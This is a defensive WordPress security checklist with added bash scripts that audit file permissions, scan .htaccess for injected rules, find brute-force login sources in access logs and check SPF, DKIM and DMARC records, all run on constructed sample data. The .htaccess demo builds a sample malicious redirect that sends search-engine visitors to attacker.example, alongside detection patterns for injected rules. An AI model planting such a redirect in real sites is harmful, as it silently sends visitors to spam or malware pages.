The majority of WordPress hacks are not sophisticated targeted attacks. They are automated scans looking for known vulnerabilities in outdated software, weak credentials, and misconfigured permissions. The good news: most of the gaps these attacks exploit are straightforward to close, and you do not need a security background to do it.
Set aside an afternoon and work through this checklist.
Check WordPress, Plugin, and Theme Update Status
Go to Dashboard > Updates. Any outdated WordPress core version, plugin, or theme is a potential entry point. Security vulnerabilities in plugins are the leading cause of WordPress compromises - attackers actively monitor vulnerability databases and scan for sites running the affected version.
Update everything. If a plugin or theme has had no release in two or more years, treat it as abandoned: nobody is going to patch the next vulnerability found in it, so replace it with an actively maintained alternative. Delete, rather than merely deactivate, anything you no longer use; a deactivated plugin's files stay on disk, and a vulnerability in them can still be reachable.
Scan with Wordfence or Sucuri SiteCheck
Wordfence Security (free) includes a malware scanner that compares your core, plugin, and theme files against the known-clean versions published on wordpress.org, flags files that have been modified or added, and looks for known malicious code patterns.
Sucuri SiteCheck (sucuri.net/website-scanner) is a free online scanner that checks your site from the outside - detecting malware, blacklist status, and security headers without requiring plugin installation.
Run both. They check different things and complement each other: Wordfence reads the files on disk, while SiteCheck sees only what a visitor sees, so a scanner running on an already compromised server can be tampered with where an outside scan cannot. If either flags something, investigate and clean up before continuing with the rest of the checklist; hardening a site that is already compromised does not remove the attacker.
Review User Accounts
Go to Users > All Users. Review every account listed. Ask:
- Do you recognize every account?
- Are there administrator accounts you did not create?
- Are there usernames like "admin," "administrator," or "user1" that are common brute-force targets?
Unknown administrator accounts are a serious red flag: they usually mean a prior compromise in which the attacker created an account to keep access. Delete any account you cannot explain after checking that nobody on your team created it; when WordPress asks what to do with that user's content, attribute it to another user so posts are not lost. While you are here, confirm each remaining account has the lowest role its owner needs (an editor does not need administrator). If your own account is named "admin", create a new administrator under a different name, log in as it, and delete the old one, attributing its content to the new account; WordPress does not let you rename a username from the dashboard.
Check File Permissions
On shared hosting, a world-writable file or folder can be modified by any process on the server, including one an attacker controls from a neighbouring account. The general rules for WordPress:
- Folders should be 755 (owner can write, others can read and enter)
- Files should be 644 (owner can read/write, others can only read)
- wp-config.php should be 600, or 640 only if PHP runs as a separate user that shares your group; it holds your database password and must never be world-readable
- No file or folder should be 777 (world-writable)
In cPanel, you can check and set permissions through File Manager. Select a file or folder, click "Change Permissions," and adjust accordingly. Wordfence also flags 777 permissions in its scan results.
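The same audit from the command line, for hosts where cPanel gives you Terminal or SSH access. This is an added example, not code from the page or from Wordfence; it assumes you pass the site root (for example ~/public_html) to the functions, and it demonstrates on a throwaway directory it builds itself so nothing on a real site is touched until you point it there:

```bash
#!/usr/bin/env bash
# Added example: audit and normalise WordPress file permissions.
# Assumption: shell access on the host; pass the site root (e.g. ~/public_html)
# to the functions. The demo below builds a throwaway tree so a real site is
# never changed by accident.

# List every world-writable file or directory under $1; a clean site prints nothing.
wp_find_world_writable() {
    find "$1" -perm -002 ! -type l | sort
}

# Apply the checklist defaults: 755 for directories, 644 for files,
# 600 for wp-config.php (it holds the database password).
wp_fix_permissions() {
    root="$1"
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    if [ -f "$root/wp-config.php" ]; then
        chmod 600 "$root/wp-config.php"
    fi
}

# Octal mode of a path (GNU stat first, BSD/macOS stat as the fallback).
wp_mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Demo on a constructed tree with the two classic mistakes: a 777 uploads
# directory and a world-writable wp-config.php.
demo_root="$(mktemp -d)"
mkdir -p "$demo_root/wp-content/uploads"
printf '<?php // constructed placeholder, not a real config\n' > "$demo_root/wp-config.php"
printf 'placeholder upload\n' > "$demo_root/wp-content/uploads/2024-photo.jpg"
chmod 777 "$demo_root/wp-content/uploads"
chmod 666 "$demo_root/wp-config.php"

echo "Before: world-writable paths"
wp_find_world_writable "$demo_root"
wp_fix_permissions "$demo_root"
echo "After: $(wp_find_world_writable "$demo_root" | wc -l | tr -d ' ') world-writable path(s)"
echo "wp-config.php is now mode $(wp_mode_of "$demo_root/wp-config.php")"
```

Run wp_find_world_writable on the real site first and read the list before running wp_fix_permissions. On hosts where PHP runs as a different user from the file owner, WordPress may need group write on wp-content/uploads after tightening; if uploads or updates stop working, ask the host which user PHP runs as rather than going back to 777.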
Verify SSL Is Valid and HTTPS Is Forced
Check that your SSL certificate is valid and not expiring soon (cPanel shows SSL status, or use ssllabs.com for a detailed check). Then verify that all traffic is redirected to HTTPS - visiting http://yourdomain.ca should automatically redirect to https://yourdomain.ca.
In WordPress, go to Settings > General and confirm both the WordPress Address and Site Address use https://. In your .htaccess file (viewable in cPanel File Manager), confirm a redirect rule forces HTTPS.
Confirm Backups Are Running
A security audit is also the right time to verify your backup system is functioning. Check your backup plugin's log (UpdraftPlus shows last backup date and status). Confirm at least one recent backup exists at an off-server location (cloud storage, not a folder on the same hosting account, which a compromise or a host failure takes down together with the site), and that you have restored from a backup at least once so you know the process works. If you cannot confirm backups are current, fix this before anything else: backups are your recovery path if anything else on this list turns out to be too late.
Check .htaccess for Unexpected Rules
In cPanel File Manager, navigate to your public_html root and view your .htaccess file (turn on "Show Hidden Files" in the File Manager settings if it is not listed). You should recognize every rule in it. Malware commonly injects redirect rules into .htaccess that send visitors to spam or malware sites while the site looks normal to you: the rules are conditioned on the visitor's referrer or user agent, so someone arriving from a search engine is redirected and the owner, typing the address directly, is not.
A clean WordPress .htaccess looks simple: the standard rewrite rules between # BEGIN WordPress and # END WordPress, perhaps a similar block added by a caching or security plugin, and possibly your host's HTTPS redirect. If you see unexplained redirects, encoded strings, or rules you did not add, treat this as a potential compromise. Check .htaccess files in subfolders too, especially wp-content/uploads, where a planted handler rule can make the server execute uploaded image files as PHP.
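A shell audit of .htaccess that covers both checks above: the HTTPS redirect from the SSL section and the unexpected-rule review from this one. It is an added example, not code from the page or from any plugin. The two .htaccess files it builds are constructed, with attacker.example standing in for a spam destination, and the "unmanaged rule" idea rests on an assumption: rules written by WordPress itself and by well-behaved plugins sit between "# BEGIN name" and "# END name" markers, so anything outside those markers was put there by a person (your host's HTTPS redirect, for instance) or by malware, and you should be able to account for every line of it:

```bash
#!/usr/bin/env bash
# Added example: inspect a WordPress .htaccess for injected rules and confirm it
# forces HTTPS. Assumption: rules written by WordPress and well-behaved plugins
# sit between "# BEGIN name" / "# END name" markers; anything outside them was
# placed by a person or by malware. attacker.example is a constructed destination.

# Print active rules outside every BEGIN/END block (comments and blanks dropped).
htaccess_unmanaged_rules() {
    awk '
        /^# BEGIN / { depth++; next }
        /^# END /   { depth--; next }
        depth == 0 && NF && substr($1, 1, 1) != "#" { print }
    ' "$1"
}

# Print line-numbered matches for what injected redirects and PHP-handler abuse
# rely on: conditions on the visitor's referrer or user agent, redirects to a
# host other than your own, PHP bound to other extensions, prepended files.
htaccess_suspicious_lines() {
    awk '
        tolower($0) ~ /http_referer|http_user_agent|addhandler|addtype.*php|auto_prepend_file|auto_append_file|base64/ {
            print NR ": " $0; next
        }
        $1 == "RewriteRule" && $3 ~ /^https?:/ && index($3, "%{HTTP_HOST}") == 0 {
            print NR ": " $0
        }
    ' "$1"
}

# Succeeds when the file contains the usual force-HTTPS pair: a RewriteCond on
# %{HTTPS} (off or !=on) and a RewriteRule whose target starts with https://.
htaccess_forces_https() {
    grep -q -i -e 'RewriteCond %{HTTPS} *off' -e 'RewriteCond %{HTTPS} *!=on' "$1" &&
    grep -q -i 'RewriteRule .* https://' "$1"
}

demo_dir="$(mktemp -d)"
demo_clean="$demo_dir/htaccess.clean"
demo_injected="$demo_dir/htaccess.injected"

# Constructed clean file: a host's HTTPS redirect plus the standard WordPress block.
cat > "$demo_clean" <<'EOF'
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF

# Constructed injected file: the same WordPress block followed by a redirect that
# only fires for visitors arriving from a search engine, so the owner never sees it.
{
    sed -n '/^# BEGIN WordPress/,/^# END WordPress/p' "$demo_clean"
    cat <<'EOF'
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|duckduckgo) [NC]
RewriteRule ^(.*)$ http://attacker.example/in.php?$1 [R=302,L]
EOF
} > "$demo_injected"

for f in "$demo_clean" "$demo_injected"; do
    echo "== $f"
    echo "-- rules outside managed blocks:"
    htaccess_unmanaged_rules "$f"
    echo "-- suspicious lines:"
    htaccess_suspicious_lines "$f"
    if htaccess_forces_https "$f"; then echo "-- HTTPS forced: yes"; else echo "-- HTTPS forced: NO"; fi
done
```

Point the three functions at the real file (~/public_html/.htaccess) and at any .htaccess under wp-content. The unmanaged-rule list is expected to contain your own additions; the suspicious-line list should be empty, and the HTTPS check should succeed on the root file.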
Test Login Page Protection
Visit yourdomain.ca/wp-login.php. It will load unless you have already moved or restricted it, and that default page is the first thing every automated brute-force tool tries. Consider:
- Login attempt limiting - Wordfence, Limit Login Attempts Reloaded, or your host's built-in protection
- Two-factor authentication - Wordfence includes 2FA for free; WP 2FA is another solid option. This is the control that actually stops a guessed or leaked password from working
- Changing the login URL - plugins like WPS Hide Login move the login page away from the default /wp-login.php path, reducing automated attack volume. This cuts noise but is not a security boundary; keep the two controls above in place as well
- Protecting xmlrpc.php - it accepts the same username and password as the login page, and a single request can batch many guesses through system.multicall, so make sure your attempt limiting covers it, or block it if nothing you use (the WordPress mobile app, Jetpack) needs it
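Before choosing between those controls it helps to see how hard the login is actually being hit, which the raw access log shows directly. This is an added example, not from the page or any plugin: the log lines are constructed in Apache combined format (the format cPanel's Raw Access download gives you), and the script assumes the log is available as a local file:

```bash
#!/usr/bin/env bash
# Added example: find sources brute-forcing the login from an access log.
# Assumption: the log is in Apache "combined" format, as downloaded from
# cPanel's Raw Access tool. The lines below are constructed, not real traffic.

SAMPLE_ACCESS_LOG='203.0.113.5 - - [10/May/2024:02:14:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:02:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:02:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:02:14:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
198.51.100.77 - - [10/May/2024:02:20:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.77 - - [10/May/2024:02:20:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.77 - - [10/May/2024:02:20:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 812 "-" "python-requests/2.31"
192.0.2.10 - - [10/May/2024:09:01:30 +0000] "GET /wp-login.php HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
192.0.2.10 - - [10/May/2024:09:01:45 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://yourdomain.ca/wp-login.php" "Mozilla/5.0"
192.0.2.10 - - [10/May/2024:09:01:46 +0000] "GET /wp-admin/ HTTP/1.1" 200 63210 "https://yourdomain.ca/wp-login.php" "Mozilla/5.0"'

# Print "ip count" for every source with at least $2 POSTs to wp-login.php or
# xmlrpc.php in log file $1, busiest first. One POST to xmlrpc.php can carry
# many password guesses via system.multicall, so it counts like a login POST.
wp_login_attackers() {
    awk -v threshold="$2" '
        $6 == "\"POST" && $7 ~ /^\/(wp-login|xmlrpc)\.php/ { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= threshold) print ip, hits[ip] }
    ' "$1" | sort -k2,2nr -k1,1
}

# Count POSTs to xmlrpc.php. If this is non-zero and you use neither the
# mobile app nor Jetpack, nothing legitimate is talking to it: block it.
wp_xmlrpc_posts() {
    awk '$6 == "\"POST" && $7 ~ /^\/xmlrpc\.php/ { n++ } END { print n + 0 }' "$1"
}

# Demo on the constructed log: a real admin login from 192.0.2.10 stays below
# the threshold; the two automated sources do not.
demo_log="$(mktemp)"
printf '%s\n' "$SAMPLE_ACCESS_LOG" > "$demo_log"
echo "Sources with 3 or more login POSTs:"
wp_login_attackers "$demo_log" 3
echo "POSTs to xmlrpc.php: $(wp_xmlrpc_posts "$demo_log")"
```

On a real log, set the threshold well above what your own team produces in a day (a few dozen is a reasonable start) and compare the output with what the limiting plugin reports as blocked; sources that appear here but not there are getting through.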
Verify SPF, DKIM, and DMARC Are in Place
Email spoofing - where attackers send email that appears to come from your domain - is a reputation and security risk. Three DNS records protect against it:
SPF lists the servers authorized to send email for your domain. DKIM adds a cryptographic signature to outgoing email that receivers verify against a public key published in your DNS. DMARC tells receiving servers what to do with a message whose From address is your domain when neither SPF nor DKIM passes for it, and where to send reports; p=none only asks for reports, while p=quarantine or p=reject is what actually stops spoofed mail from being delivered.
You can check all three at mxtoolbox.com/emailhealth - enter your domain and it will show which records are present and whether they are configured correctly. cPanel's Email Deliverability tool also generates and helps you install these records.
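The checks mxtoolbox performs on those three records, done locally so you can read the records yourself. This is an added example, not from the page or from any tool it names. The records it evaluates are constructed (example.com placeholders and a fake DKIM key), and the live-lookup helper assumes dig is installed and that you know your DKIM selector (your mail provider publishes it; "default" is only a common choice, not a rule):

```bash
#!/usr/bin/env bash
# Added example: sanity-check SPF, DKIM and DMARC records. The demo records are
# constructed (example.com, a fake DKIM key); the live lookups need dig and a network.

# Live lookup helper (not used by the offline demo). dig prints TXT data quoted
# and may split a long record into several quoted chunks, so rejoin them.
# Usage: spf_check "$(fetch_txt example.com | grep '^v=spf1')"
#        dmarc_check "$(fetch_txt _dmarc.example.com)"
#        dkim_check "$(fetch_txt default._domainkey.example.com)"   # selector is provider-specific
fetch_txt() {
    dig +short TXT "$1" | sed -e 's/" "//g' -e 's/^"//' -e 's/"$//'
}

# Value of tag $2 in a "tag=value; tag=value" record $1 (DKIM and DMARC syntax).
tag_value() {
    printf '%s\n' "$1" | tr -d ' ' | tr ';' '\n' | awk -v tag="$2" '
        index($0, tag "=") == 1 { print substr($0, length(tag) + 2); exit }'
}

spf_check() {
    rec="$1"
    case "$rec" in
        "v=spf1"|"v=spf1 "*) ;;
        *) echo "SPF: FAIL (record does not start with v=spf1)"; return 1 ;;
    esac
    # include:, a, mx, ptr, exists: and redirect= each cost a DNS lookup;
    # RFC 7208 caps the total at 10, and receivers fail the record beyond that.
    lookups=$(printf '%s\n' "$rec" | tr ' ' '\n' |
        grep -c -E '^[-+~?]?(include:|a$|a:|a/|mx$|mx:|mx/|ptr|exists:|redirect=)' || true)
    if [ "$lookups" -gt 10 ]; then
        echo "SPF: FAIL ($lookups lookup terms; receivers stop evaluating after 10)"; return 1
    fi
    case "$rec" in
        *" -all") echo "SPF: ok (-all; $lookups lookup terms)"; return 0 ;;
        *" ~all") echo "SPF: ok (~all soft fail; $lookups lookup terms)"; return 0 ;;
        *" +all"|*" ?all") echo "SPF: FAIL (ends in ${rec##* }, which authorises any sender)"; return 1 ;;
        *) echo "SPF: FAIL (no terminal all mechanism; unlisted senders are treated as neutral)"; return 1 ;;
    esac
}

# Exit status: 0 enforcing, 2 present but only monitoring, 1 missing or invalid.
dmarc_check() {
    rec="$1"
    case "$rec" in
        "v=DMARC1;"*) ;;
        *) echo "DMARC: FAIL (no record starting with v=DMARC1 at _dmarc.<domain>)"; return 1 ;;
    esac
    policy="$(tag_value "$rec" p)"
    case "$policy" in
        reject|quarantine) echo "DMARC: ok (p=$policy; spoofed mail is rejected or junked)"; return 0 ;;
        none) echo "DMARC: WEAK (p=none only reports; spoofed mail is still delivered)"; return 2 ;;
        *) echo "DMARC: FAIL (missing or invalid p= tag)"; return 1 ;;
    esac
}

dkim_check() {
    norm="$(printf '%s' "$1" | tr -d ' ')"
    case ";$norm;" in
        *";p="*) ;;
        *) echo "DKIM: FAIL (no p= tag; wrong selector or record not published)"; return 1 ;;
    esac
    key="$(tag_value "$1" p)"
    if [ -z "$key" ]; then
        echo "DKIM: FAIL (empty p= means the key was revoked)"; return 1
    fi
    echo "DKIM: ok (public key present, ${#key} characters)"; return 0
}

# Demo on constructed records.
report() { "$@" || echo "   -> needs attention (exit status $?)"; }
DEMO_SPF='v=spf1 include:_spf.example.com mx -all'
DEMO_DKIM='v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCconstructedPlaceholderKeyNotRealAAAB'
DEMO_DMARC='v=DMARC1; p=reject; rua=mailto:dmarc@example.com'
DEMO_BAD_SPF='v=spf1 a mx +all'
DEMO_REVOKED_DKIM='v=DKIM1; k=rsa; p='
DEMO_BAD_DMARC='v=DMARC1; p=none; rua=mailto:dmarc@example.com'

echo "Good records:"
report spf_check "$DEMO_SPF"; report dkim_check "$DEMO_DKIM"; report dmarc_check "$DEMO_DMARC"
echo "Weak records:"
report spf_check "$DEMO_BAD_SPF"; report dkim_check "$DEMO_REVOKED_DKIM"; report dmarc_check "$DEMO_BAD_DMARC"
```

A domain can have several TXT records at its apex, which is why the SPF usage line filters for v=spf1; there must be exactly one. The DKIM check only confirms a key is published under the selector you queried; whether outgoing mail is actually signed with it is something you verify by sending yourself a message and reading the Authentication-Results header.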
The Result
Working through this checklist in a single afternoon closes the gaps that account for the majority of WordPress compromises. Set a reminder to repeat this audit every six months. Security is not a one-time project - it is an ongoing practice.

